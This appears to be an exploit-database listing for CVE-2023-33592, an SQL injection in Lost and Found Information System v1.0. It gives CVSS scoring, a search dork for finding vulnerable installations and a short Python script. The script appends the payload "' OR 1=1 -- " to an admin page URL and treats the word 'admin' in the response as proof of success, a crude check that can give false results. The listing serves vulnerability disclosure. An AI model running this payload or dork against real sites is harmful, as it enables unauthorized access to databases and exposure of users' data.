zdt | Amirhossein Bahramizadeh | 1337DAY-ID-38851
Jul 06, 2023 - 12:00 a.m.

Lost and Found Information System v1.0 - SQL Injection Exploit

2023-07-06 00:00:00
Amirhossein Bahramizadeh
0day.today
Tags: exploit, sql injection, web application, vulnerability, iran, cve-2023-33592, windows, linux, amirhossein bahramizadeh, requests library

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.002
Percentile: 57.7%

# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")
